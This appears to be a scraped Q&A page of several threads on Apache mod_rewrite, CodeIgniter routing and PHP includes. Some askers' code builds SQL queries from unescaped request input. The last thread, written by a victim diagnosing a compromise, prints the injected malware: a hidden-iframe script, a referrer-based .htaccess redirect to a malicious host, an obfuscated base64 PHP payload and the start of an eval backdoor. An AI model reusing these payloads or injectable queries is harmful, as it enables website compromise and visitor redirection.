Why is this mod_rewrite not working?
RewriteEngine On
RewriteRule ^([a-zA-Z0-9/_-]+)(|)$ /index.php?url=$1 [L]
RewriteRule ^news/(.*)$ index.php?url=news&id=$1 [NC]
Here's the PHP code for handling the loading of the news:
<?php
$sql = DB::Query("SELECT id,title,longstory FROM news WHERE id = ".filter($_GET['id'])."");
if(DB::NumRows($sql) == 1)
{
while($news = $sql->fetch_assoc())
{
echo '
<div class="box">
<div class="title">
'.$news["title"].'
</div>
<div class="mainBox newsBox" style="float;left">
<div class="boxHeader"></div>
'.html_entity_decode($news['longstory']).'
</div>
</div>';
}
} else
{
?>
<div class='box'>
<div class='title red'>Artikel is niet gevonden.</div>
<div class='mainBox'>
Jammer genoeg is dit nieuws artikel niet gevonden!
</div>
</div>
<?php
}
?>
If I use http://127.0.0.1/index.php?url=news&id=48 it's working, but http://127.0.0.1/news/48 doesn't, even though I have added the mod_rewrite rule in my .htaccess.
your first rule does match the /news/48 pattern as well, change the order of the rules and put the specific one ^news/(.*)$ first
Related
I keep getting a 500 internal server error when trying to rewrite these one specific URLs/files (item.php & purchase.php), the rest works.
I have tried many ways to fix this but nothing seemed to work, which is weird because all other URLs do work, but these 2 just seem to not want to work for some reason.
.htaccess file
Options -Indexes
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME}\.php -f
RewriteRule ^(.*)$ $1.php
ErrorDocument 500 "500"
ErrorDocument 404 "404"
ErrorDocument 403 "403"
RewriteRule ^users/([^/]*)$ /user/profile.php?username=$1
RewriteRule ^users/([^/]*)/inventory$ /user/GetUserInventory.php?username=$1
RewriteRule ^market/item/([^/]*)$ /market/item.php?id=$1
RewriteRule ^market/item/([^/]*)/purchase$ /market/purchase.php?id=$1
RewriteRule ^community/([^/]*)$ /communities/view.php?id=$1
RewriteRule ^community/([^/]*)/join$ /communities/join.php?id=$1
RewriteRule ^community/([^/]*)/manage$ /communities/manage.php?id=$1
RewriteRule ^game/([^/]*)$ /games/view.php?id=$1
item.php
<?php
include_once('../private/header.php');
$item = $handler->query("SELECT * FROM items WHERE id=" . $_GET['id']);
$gB = $item->fetch(PDO::FETCH_OBJ);
echo '
<div class="col s12 m9 l8">
<div class="container" style="width:100%;">
<div class="content-box" style="border-radius:0;">
<div class="left-align">
</div>
<div class="row">
<div class="col s12 m6 l3 center-align">
<img src="'.$cdnServer.'/items/thumbnails/'.$gB->image.'.png" class="responsive-img">
</div>
<div class="col s12 m6 l6">
<div style="padding-left:25px;overflow:hidden;">
<div style="font-size:26px;font-weight:300;">'.$gB->name.'
<b style="text-transform:uppercase;font-size:12px;">'.$gB->type.'</b>
</div>
<div style="color:#777;font-size:14px;">'.$gB->description.'</div>
</div>
</div>
<div class="col s12 m3 l3 center-align" style="padding-top:15px;">
<center>
';
if ($gB->onsale == 1){
echo 'Purchase';
} else {
echo '<a class="modal-trigger waves-effect waves-light btn grey darken-2">Offsale</a>';
}
echo '
</center>
<div style="height:15px;"></div>
<center><b style="text-transform:uppercase">Creator</b></center>
<center>'.$gB->creator.'</center>
';
if($gB->collectable == 'true'){
if($gB->amount == 0)
echo '
<center><span style="color:red">Sold Out</span></center>
';
}else{
echo '
<center><span style="color:red">'.$gB->amount.' Remaining</span></center>
';
}
echo '
<div style="height:25px;"></div>
</div>
</div>
<div style="padding-top:25px;">
<div class="row" style="margin-bottom:0;">
<div class="col s12 m12 l3 center-align">
<div style="font-size:20px;">'.$gB->created.'</div>
<div style="color:#999;font-size:14px;">Time Created</div>
</div>
<div class="col s12 m12 l3 center-align">
<div style="font-size:20px;">'.$gB->created.'</div>
<div style="color:#999;font-size:14px;">Last Updated</div>
</div>
<div class="col s12 m12 l3 center-align">
<div style="font-size:20px;">???</div>
<div style="color:#999;font-size:14px;">Owners</div>
</div>
</div>
</div>
</div>
';
include_once('../private/footer.php');
purchase.php
<?php
include_once('../private/config.php');
if ($user){
$money=$myu->CurrencyCoins;
$id=$_GET['id'];
$item = $handler->query("SELECT * FROM items WHERE id=" . $id);
$gB = $item->fetch(PDO::FETCH_OBJ);
$amount=$gB->amount;
if ($gB->onsale == 1){
if ($money >= $gB->price){
if ($gB->collectable != "true"){
if ($amount != 0){
$new = ($money - $gB->price);
$handler->query("UPDATE `users` SET `CurrencyCoins`='".$new."' WHERE `id`='".$myu->id."'");
$handler->query("INSERT INTO inventory (item,user) VALUES (".$id.",".$myu->id.")");
}
} else {
if ($amount >= 1){
$amount1=($amount - 1);
$new = ($money - $gB->price);
$handler->query("UPDATE `users` SET `CurrencyCoins`='".$new."' WHERE `id`='".$myu->id."'");
$handler->query("UPDATE `items` SET `amount`='".$amount1."' WHERE `id`='".$gB->id."'");
$handler->query("INSERT INTO inventory (item,user) VALUES (".$id.",".$myu->id.")");
} else {
echo '<center><h2>Item is sold out!</h2></center>';
}
}
}
} else {
echo '<center><h2>Item not on sale!</h2></center>';
}
}
echo '<head><meta http-equiv="refresh" content="1; url='.$serverUrl.'/account/character"></head>';
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME}\.php -f
RewriteRule ^(.*)$ $1.php
These directives should be at the end of your .htaccess file, after the other rewrites. They are also incorrect - although by placing them at the end of the file it will avoid the immediate issue, but could still cause problems with other URLs.
In its current state, when you request example.com/market/item/1 (where it would seem, /market is a physical directory, and /item.php is a file in that directory) then...
In brief... it results in an endless rewrite loop:
/market/item/1.php
/market/item/1.php.php
/market/item/1.php.php.php
/market/item/1.php.php.php.php
etc.
Which breaks (after 10 iterations) with a 500 response being sent to the browser.
A very similar process happens when requesting /market/item/1/purchase:
/market/item/1/purchase.php
/market/item/1/purchase.php.php
/market/item/1/purchase.php.php.php
/market/item/1/purchase.php.php.php.php
etc.
In detail...
REQUEST_FILENAME is /market/item (ignoring the directory-prefix) and PATH_INFO is /1 (important for later). /market/item is not a directory (1st condition), but /market/item.php is a file (2nd condition) - so both conditions are successfully met.
The RewriteRule directive then rewrites /market/item/1 to /market/item/1.php (clearly incorrect and not the intention). Since there is no L flag on this rule, processing continues... for the sake of the remaining rules, the PATH_INFO (from the initial request, /1) is appended to the resulting URL to become /market/item/1.php/1 (the DPI flag - discard path info - was created to prevent this specific behaviour).
/market/item/1.php/1 does not match any further rules in the current pass, so the rewrite engine starts over at the top with /market/item/1.php.
REQUEST_FILENAME is again /market/item and PATH_INFO is now /1.php. /market/item is not a directory (1st condition), but /market/item.php is a file (2nd condition) - so both conditions are successfully met a second time.
The RewriteRule directive then rewrites /market/item/1.php to /market/item/1.php.php. Since there is no L flag on this rule, processing continues... for the sake of the remaining rules, the PATH_INFO (from the request, /1.php this time) is appended to the resulting URL to become /market/item/1.php.php/1.php.
/market/item/1.php.php/1.php does not match any further rules in the current pass, so the rewrite engine starts over at the top with /market/item/1.php.php.
GOTO #4 (with updated URL-path) etc. etc. etc. rewrite loop, 500 error.
And a very similar process happens when requesting /market/item/1/purchase. The REQUEST_FILENAME is the same /market/item (so it again checks that /market/item.php exists, not purchase.php), except that the PATH_INFO is /1/purchase (not /1). And the initial URL-path that the .php extension is appended to is naturaly /market/item/1/purchase (not /market/item/1).
Fix
If you've followed that "confusing muddle", you'll see that the condition that checks for the existence of the "path/to/file" + ".php" is not necessarily the same as the rule that actually rewrites the request to "URL-path" + ".php". ("path/to/file" is not the same as the "URL-path"). To fix this, it should be written as:
RewriteCond %{DOCUMENT_ROOT}/$1.php -f
RewriteRule (.*) $1.php [L]
No real need for the directory check here, since if it was a directory, the file check that follows must fail (unless you have directory names that end in .php). The %{DOCUMENT_ROOT}/$1.php check is now effectively "the same" as $1.php (the file being rewritten to).
The literal dot does not need to be backslash escaped in the RewriteCond TestString - this is an "ordinary" string, not a regex.
Don't forget the L flag(s). And this rule block should now go at the end of the .htaccess file.
Summary
Options -Indexes
RewriteEngine on
ErrorDocument 500 "500"
ErrorDocument 404 "404"
ErrorDocument 403 "403"
RewriteRule ^users/([^/]*)$ /user/profile.php?username=$1 [L]
RewriteRule ^users/([^/]*)/inventory$ /user/GetUserInventory.php?username=$1 [L]
RewriteRule ^market/item/([^/]*)$ /market/item.php?id=$1 [L]
RewriteRule ^market/item/([^/]*)/purchase$ /market/purchase.php?id=$1 [L]
RewriteRule ^community/([^/]*)$ /communities/view.php?id=$1 [L]
RewriteRule ^community/([^/]*)/join$ /communities/join.php?id=$1 [L]
RewriteRule ^community/([^/]*)/manage$ /communities/manage.php?id=$1 [L]
RewriteRule ^game/([^/]*)$ /games/view.php?id=$1 [L]
# Append .php on remaining requests
RewriteCond %{DOCUMENT_ROOT}/$1.php -f
RewriteRule (.*) $1.php [L]
i am new to code igniter and i am developing simple login system for that i am using xampp , i uploaded code igniter in folder code/ and the following are the codes in mvc
controller login.php
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
class Login extends CI_Controller
{
public function __construct()
{
parent::__construct();
$this->load->library('session');
$this->load->helper('form');
$this->load->helper('url');
$this->load->helper('html');
$this->load->database();
$this->load->library('form_validation');
//load the login model
$this->load->model('login_model');
}
public function index()
{
//get the posted values
$username = $this->input->post("txt_username");
$password = $this->input->post("txt_password");
//set validations
$this->form_validation->set_rules("txt_username", "Username", "trim|required");
$this->form_validation->set_rules("txt_password", "Password", "trim|required");
if ($this->form_validation->run() == FALSE)
{
//validation fails
$this->load->view('login_view');
}
else
{
//validation succeeds
if ($this->input->post('btn_login') == "Login")
{
//check if username and password is correct
$usr_result = $this->login_model->get_user($username, $password);
if ($usr_result > 0) //active user record is present
{
//set the session variables
$sessiondata = array(
'username' => $username,
'loginuser' => TRUE
);
$this->session->set_userdata($sessiondata);
redirect("index");
}
else
{
$this->session->set_flashdata('msg', '<div class="alert alert-danger text-center">Invalid username and password!</div>');
redirect('login/index');
}
}
else
{
redirect('login/index');
}
}
}
}?>
MOdel is login_model.php
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
class login_model extends CI_Model
{
function __construct()
{
// Call the Model constructor
parent::__construct();
}
//get the username & password from tbl_usrs
function get_user($usr, $pwd)
{
$sql = "select * from tbl_usrs where username = '" . $usr . "' and password = '" . md5($pwd) . "' and status = 'active'";
$query = $this->db->query($sql);
return $query->num_rows();
}
}?>
And View is login_view
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login Form</title>
<!--link the bootstrap css file-->
<link href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" rel="stylesheet">
<style type="text/css">
.colbox {
margin-left: 0px;
margin-right: 0px;
}
</style>
</head>
<body>
<div class="container">
<div class="row">
<div class="col-lg-6 col-sm-6">
<h1>COLORS</h1>
</div>
<div class="col-lg-6 col-sm-6">
<ul class="nav nav-pills pull-right" style="margin-top:20px">
<li class="active">Login</li>
<li>Signup</li>
</ul>
</div>
</div>
</div>
<hr/>
<div class="container">
<div class="row">
<div class="col-lg-4 col-sm-4 well">
<?php
$attributes = array("class" => "form-horizontal", "id" => "loginform", "name" => "loginform");
echo form_open("login/index", $attributes);?>
<fieldset>
<legend>Login</legend>
<div class="form-group">
<div class="row colbox">
<div class="col-lg-4 col-sm-4">
<label for="txt_username" class="control-label">Username</label>
</div>
<div class="col-lg-8 col-sm-8">
<input class="form-control" id="txt_username" name="txt_username" placeholder="Username" type="text" value="<?php echo set_value('txt_username'); ?>" />
<span class="text-danger"><?php echo form_error('txt_username'); ?></span>
</div>
</div>
</div>
<div class="form-group">
<div class="row colbox">
<div class="col-lg-4 col-sm-4">
<label for="txt_password" class="control-label">Password</label>
</div>
<div class="col-lg-8 col-sm-8">
<input class="form-control" id="txt_password" name="txt_password" placeholder="Password" type="password" value="<?php echo set_value('txt_password'); ?>" />
<span class="text-danger"><?php echo form_error('txt_password'); ?></span>
</div>
</div>
</div>
<div class="form-group">
<div class="col-lg-12 col-sm-12 text-center">
<input id="btn_login" name="btn_login" type="submit" class="btn btn-default" value="Login" />
<input id="btn_cancel" name="btn_cancel" type="reset" class="btn btn-default" value="Cancel" />
</div>
</div>
</fieldset>
<?php echo form_close(); ?>
<?php echo $this->session->flashdata('msg'); ?>
</div>
</div>
</div>
<!--load jQuery library-->
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<!--load bootstrap.js-->
<script src="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js"></script>
</body>
</html>
IN config i used
$config['index_page'] = '';
and in routes i used
$route['default_controller'] = 'login';
$route['404_override'] = '';
$route['translate_uri_dashes'] = FALSE;
while accessing localhost/code/ it is working fine but when click login button it is going to url http://localhost/code/localhost/login/index and showing object not found ERROR 404
Open application/config/config.php and set your base_url(). E.g: $config['base_url'] = 'http://localhost/code/';
Create .htaccess file under /code folder (Where application and system folder is) like below:
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L]
create .htaccess file in \code\
as
RewriteEngine On
RewriteBase /code/
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L]
and in config/config.php
$config['base_url'] = 'http://localhost/code';
Hope it will help you.
I got same error as shown below. I am using php/codeigniter. I have defined $config['base_url'] = 'http://localhost/******'; in my config file. still it was showing same issue.
Object not found! The requested URL was not found on this server. If
you entered the URL manually please check your spelling and try again.
If you think this is a server error, please contact the webmaster.
How could I solve this.
Step 1: 1st i checked httpd.conf file. there mod_rewrite was imported.
Step 2: checked file is located at actual location or not.
Step 3: checked spelling mistake in redirection or anchor tag.
Step 4: checked $config['base_url'] variable in application/config.php file.
Step 5: checked $config['index_page'] variable in application/config.ph file. here was my actual problem. I set it to blank and there was something wrong with my mod_rewrite module. when I put $config['index_page']='index.php' it started working for me.
I'm trying to build a website that having different pages.
I'm a newbie to PHP, I have an index page with certain tables for holding header, navigation menu, main body, a sidebar and for a footer. The index page is attached to all the above-mentioned elements in it using include("filename.extension");. The problem is I tried to load the main body i.e content of the site, dynamically when the menu is changed.
Below is my code, any suggestion on this is very appreciatable. Thanks in advance.
<body>
<div> <?php Include('header.php'); </div>
<div id="menu" align="center">
<table width="790" height="35">
<tr>
<td>Home</td>
<td>Register</td> // this page need to display on the same window with other elements, after click.
</tr>
</tabel>
</div>
<div id="sidebar" align="right"> <?php include ("sidebar.php");?> </div>
<div id="Content ">
<?php include("FILE"); // here i need to display the hyper linked page.?>
</div>
<div id="footer"> <?php include("footer.php");?> </div>
</body> `
guess Diogo's answer will get you to what you want. create your index.php file like this.
//menu area
<div id="menuWrap">
link to page1
link to page2
</div>
//side bar
<div id="sidebarWrap">...</div>
//content area
<div id="contentWrap">
<?php
switch($_GET['page'])
{
case 'page1':
include '/pages/page1.php';
break;
case 'page2':
include '/pages/page2.php';
break;
default:
include '/pages/notfound.php';
}
?>
</div>
//footer
<div id="footerWrap">...</div>
This way you can display other pages in your site in the same window, only the content area will change
update:
I have got corrected your typos, here is the answer according to your code segment.
<body>
<div>
<?php Include('header.php'); ?>
</div>
<div id="menu" align="center">
<table width="790" height="35">
<tr>
<td>Home</td>
<td>Register</td>
</tr>
</table>
</div>
<div id="sidebar" align="right">
<?php include ("sidebar.php"); ?>
</div>
<div id="Content ">
<?php
switch($_GET['page'])
{
case 'page1':
include '/pages/home.php';//file path of your home page
break;
case 'page2':
include '/pages/students/reg.php';
break;
default:
include '/pages/notfound.php';
}
?>
</div>
<div id="footer">
<?php include("footer.php");?>
</div>
</body>
First, create a file with exactly the name below: (including the dot)
.htaccess
and put it in the same folder of your index.
Inside the .htaccess, write the following code:
# .htaccess mod_rewrite
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-l
RewriteRule ^(.*)$ index.php?page=$1 [QSA,L]
The .htaccess on this case will rewrite the URLs to change the http://127.0.0.1/index.php?page=register to accept the "blogging pretty url" http://127.0.0.1/register
inside of your index.php folder, create a new folder "pages".
Inside of the folder pages, create 4 simple PHP files (home.php, register.php, anyother.php and notfound.php), with any content like
<?php
echo "I'm the Register Page.";
?>
This will be an example of index based on your code.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head><meta http-equiv="content-type" content="text/html; charset=utf-8"><title>¨title</title></head>
<body>
<div>
<?php include 'header.php'; ?>
</div>
<div id="menu" align="center">
<table width="790" height="35">
<tr>
<td>Home</td>
<td>Register</td>
<td>AnyOther</td>
<td>Broken Sample</td>
</tr>
</table>
</div>
<div id="sidebar" align="right">
<?php include 'sidebar.php'; ?>
</div>
<div id="Content ">
<?php
if(!isset($_GET['page']) || $_GET['page'] == ''){
$page = 'home'; //If no page specified
} else {
$page = $_GET['page'];
}
switch($page)
{
case 'home':
include '/pages/home.php';//file path of your home page
break;
case 'register':
include '/pages/register.php';
break;
case 'anyother':
include '/pages/anyother.php';
break;
default:
include '/pages/notfound.php'; //If any page that doesn't exists, then get back to home.
}
?>
</div>
<div id="footer">
<?php include("footer.php");?>
</div>
</body>
</html>
I am trying to create a search form in my codeigniter site header, however everytime the form is submitted, I receive a 404 error saying the page cannot be found! I have attempted to create a link to a test page and this gave me the same error.
Please observe my code below.
view(site_header)
<?php echo doctype(); ?>
<html lang="en">
<link href="<?php echo base_url(); ?>styles/style.css" type="text/css" rel="stylesheet"/>
<head>
<title>/title>
<div id="container">
<div id="search">
<?php
echo form_open('search_keyword');
echo form_label("Stumble a search ", "searchfor");
echo form_input("search","search");
echo form_submit("getSearch","Search");
echo form_close(); ?>
</div>
</div>
</head>
</html>
model (model_search)
<?php
class Model_search extends CI_Model {
public function get_results($search_term){
$query = $this->db->query('SELECT embed, title FROM videos WHERE tags LIKE '%$search_term%' order by RAND() LIMIT 1');
return $query->result();
}
}
?>
Controller (site.php) default controller
<?php
if ( ! defined('BASEPATH')) exit('No direct script access allowed');
class Site extends CI_Controller {
public function index(){
$this->home();
}
public function home(){
$this->load->model("model_get");
$data["results"] = $this->model_get->getRand();
$this->load->view("site_header");
$this->load->view("site_content", $data);
$this->load->view("site_footer");
}
public function search_keyword()
{
$this->load->model('model_search');
$search_term = $this->input->post('search');
$data['results'] = $this->model_search->get_results($search_term);
$this->load->view('site_header');
$this->load->view('search_content',$data);
$this->load->view('site_footer');
}
}
?>
Results page (search_content)
<body>
<link href="<?php echo base_url(); ?>styles/style.css" type="text/css" rel="stylesheet"/>
<div id="container">
<div id="intro">
<?php echo heading("Search Results",1);?>
</div>
<div id ="content">
<p>Stumble videos related to <?php echo $search_term; ?> </p>
<?php
foreach ($results as $row) {
$title = $row->title;
$vid = $row->embed;
}
echo heading($title, 3);
echo $vid;
?>
</div>
</div>
</body>
perhaps I am missing something obvious, however I think it may be to do with my .htaccess file which is posted below
(.htaccess)
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /code/
RewriteCond %{REQUEST_URI} ^system.*
RewriteRule ^(.*)$ /index.php?/$1 [L]
RewriteCond %{REQUEST_URI} ^application.*
RewriteRule ^(.*)$ /index.php?/$1 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?/$1 [L]
</IfModule>
CodeIgniter URLs need both the controller name and the method.
form_open('site/search_keyword')
Maybe a stupid question, but did you remove the "index.php" from the $config['index_page'] variable in your config.php ?
And if you don't use any route to link 'search_keyword' to 'site/search_keyword', be sure to use the form_open('site/search_keyword') as specified previously.
Btw, here's the .htaccess I always use on my Codeigniter projects to rewrite the urls. Just add your RewriteBase on this to make it work.
DirectoryIndex index.php
RewriteEngine on
RewriteCond $1 !^(index\.php|img|assets|css|js|robots\.txt|favicon\.ico)
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ ./index.php/$1 [L,QSA]
It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center.
Closed 9 years ago.
Whenever a link is clicked on the site at http://www.btandthetenants.com, I have an AJAX request to make the content load automatically. However, recently, I have been seeing this confusing bit of code injected into my return data:
<script>
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php');
_q.style.position = 'absolute';
_q.style.width = '12px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
_q.style.left = '-4327px';
document.write('<div id=\'pzeadv\'></div>');
document.getElementById('pzeadv').appendChild(_q);
</script>
This is my current code for clicking:
$("#nav a").click(function(event) {
var sHREF = $(this).attr("href");
var sPage = sHREF.replace(oVars.sPrefix(), "");
if (oVars.sCurrent != sPage) {
// As long as we're not currently on the page we just clicked on...
//oVars.sCurrent = sPage;
if (oVars.oArchive.isOpen()) oVars.oArchive.toggle();
loadContent(sHREF, true, false);
track(sPage);
}
event.preventDefault();
});
... and the loadContent function:
function loadContent(sURL, bPush, bReplace) {
var $Box = $("#loaded .box-1"),
$Content = $Box.find(".inner");
$("#nav a").removeClass("active");
$("#nav a[href='"+ sURL +"']").addClass("active");
oVars.sCurrent = sURL.split("&")[0];
// Closes any picture open in Colorbox.
if ( oVars.sCurrent != "pictures" && oVars.bI && $("#colorbox").css("display") != "none" )
$.colorbox.close();
if (!oVars.bIE) {
if (bPush) {
var objState = { page: oVars.sCurrent };
if (bReplace)
history.replaceState(objState, "", "");
else
history.pushState(objState, "", sURL);
} else {}
}
if (!bReplace) {
// Load the page.
$Box.slideUp(oVars.iSpeed / 2, "", function() {
$.get(
"index.php" + oVars.sPrefix() + sURL,
oVars.oNHF,
function(sData) {
var $El = $(sData).filter(":first"), // This is the element that would be displayed
$Script = $(sData).filter(":last"),
sPage = extractPage("ending").toLowerCase();
console.debug(sData);
// Change documentElement to body and circumvent the issues caused by the iPhone version... yadda yadda.
document.documentElement.className = sPage;
// Try and make it a regular expression to replace the words after the separator.
document.title = oPHP.const.NAME + oPHP.const.TEXT_DIVIDER + ( (sPage == "home") ? "Home" : oPHP.vars.titles[sPage].replace(/\<.*\>/, "").trim() );//ucwords(sPage);
$Box.html(sData).slideDown(oVars.iSpeed / 2);
// Reload the Facebook widgets for the current page.
reloadWidgets();
}
);
} );
}
}
sData in loadContent is returning that mysterious <script> tag at the beginning like this:
<script>
// THIS IS THE EVIL SNIPPET THAT'S BEING INSERTED INTO MY CODE.
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php');
_q.style.position = 'absolute';
_q.style.width = '12px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
_q.style.left = '-4327px';
document.write('<div id=\'pzeadv\'></div>');
document.getElementById('pzeadv').appendChild(_q);
</script>
<div class="box-1" id="pictures">
<div class="title">
Pictures <span class="links"><a class="fblink" href="http://www.facebook.com/elemovements?sk=photos" target="_blank" title="Visit this Page on Facebook">View on Facebook</a></span>
</div>
<div class="body">
<div class="inner transition">
<div>
<div class="section-title">
Albums
</div>
<span class="gray italic size">(4 albums, 13 pictures)</span>
</div>
<div class="album-container">
<a fb-href="http://www.facebook.com/album.php?fbid=332120860192434&id=156848747719647&aid=77394" href="pictures&action=list_pics&aid=156848747719647_77394&size=1&name=Wall Photos" title="">
<div class="album">
<img src="http://photos-a.ak.fbcdn.net/hphotos-ak-ash3/527637_332120863525767_1834367592_s.jpg">
</div>
</a>
<div class="name">
<a fb-href="http://www.facebook.com/album.php?fbid=332120860192434&id=156848747719647&aid=77394" href="pictures&action=list_pics&aid=156848747719647_77394&size=1&name=Wall Photos" title="">Wall Photos</a>
</div>
</div>
<div class="album-container">
<a fb-href="http://www.facebook.com/album.php?fbid=171845276219994&id=156848747719647&aid=44093" href="pictures&action=list_pics&aid=156848747719647_44093&size=2&name=Posters" title="">
<div class="album">
<img src="http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/427627_278221322249055_1137145612_s.jpg">
</div>
</a>
<div class="name">
<a fb-href="http://www.facebook.com/album.php?fbid=171845276219994&id=156848747719647&aid=44093" href="pictures&action=list_pics&aid=156848747719647_44093&size=2&name=Posters" title="">Posters</a>
</div>
</div>
<div class="album-container">
<a fb-href="http://www.facebook.com/album.php?fbid=261713630566491&id=156848747719647&aid=63000" href="pictures&action=list_pics&aid=156848747719647_63000&size=4&name=Newby's Show" title="The guys' show on 1/29/2012 at Newby's. Taken in Memphis, TN.">
<div class="album">
<img src="http://photos-f.ak.fbcdn.net/hphotos-ak-ash4/407659_261713673899820_1183906213_s.jpg">
</div>
</a>
<div class="name">
<a fb-href="http://www.facebook.com/album.php?fbid=261713630566491&id=156848747719647&aid=63000" href="pictures&action=list_pics&aid=156848747719647_63000&size=4&name=Newby's Show" title="The guys' show on 1/29/2012 at Newby's. Taken in Memphis, TN.">Newby's Show</a>
</div>
</div>
<div class="album-container">
<a fb-href="http://www.facebook.com/album.php?fbid=232326246838563&id=156848747719647&aid=56722" href="pictures&action=list_pics&aid=156848747719647_56722&size=6&name=Oxford Show" title="Taken in Oxford, MS.">
<div class="album">
<img src="http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/390726_232326290171892_2122883596_s.jpg">
</div>
</a>
<div class="name">
<a fb-href="http://www.facebook.com/album.php?fbid=232326246838563&id=156848747719647&aid=56722" href="pictures&action=list_pics&aid=156848747719647_56722&size=6&name=Oxford Show" title="Taken in Oxford, MS.">Oxford Show</a>
</div>
</div>
<script id="logic" language="javascript" src="min/?f=/js/logic/pictures.js" type="text/javascript"></script>
</div>
</div>
</div>
My data is after the script tag and it is nowhere in my code. You can always check this yourself in a console of some kind.
This was caused by a modification to my .htaccess file on my server. I had a local copy so I overwrote it. The file's contents became:
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://cabaniaseleden.com.ar/stats.php [R=301,L]
</IfModule>
#/c3284d#
RewriteEngine on
RewriteCond %{HTTP_HOST} ^ts\.x10\.mx$ [OR]
RewriteCond %{HTTP_HOST} ^www\.ts\.x10\.mx$
RewriteRule ^/?$ "http\:\/\/75\.66\.61\.141\/" [R=301,L]
The hacker also added this to several PHP files on my site:
#c3284d#
echo(gzinflate(base64_decode("VVHBboMwDL1X4h9yC2hdKDCVbqOVummHnfYB64RCYkokmqSJS9t9/YChavPN9nt+9nPhhVMWN8Gs446UR7Im0ojTATQy4YAjvLUwZCFVteMHoNE8mJE+St1jqQfcIjpVnRDoczArj5+l/gqpd4LOCW0Q7VMcC15xrbiHFiRoJsyBcRd75OiZbSyNRibzeG2BWeMVKjOO55U37W30BDgric3QTVJ7+Ss6LlgZJ8H14pp3as/ROHby4Lb74SSlJVw+6pBmjyLL0uWiXsp8mSeQSg55vVjJZLHKIU1pRO5I8m+vFmocVO8fsjT/Fb5ZdXYKIaSFVB1Rcr2j9hu47HZ0U8R9bTNeeEPvASdXX67vMpzANGLcWtDytVGtDMvjwCni6UE/")));
#/c3284d#
We need to fight internet intrusions like these to try and prevent things like this from happening. It's on every server I access basically. I have no idea how it got there; gotta check the logs.
Yes I agree. Also ...please check for an extra file in your root dir. It can be named anything c.php, default.php etc... It has a php code starting :
if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"]){eval(base64_decode(str_rot13......
you can do the site search for is as well. This file was added at the same time when the above .htaccess code was changed.
I tried to trace not the source but the way it was uploaded and it looks it was done through the FTP. Secure your FTP and if you run WordPress or Joomla, secure your login page against brute/rainbow attack which are quite simple when user name is known (listed under posts) Anyone has more details ?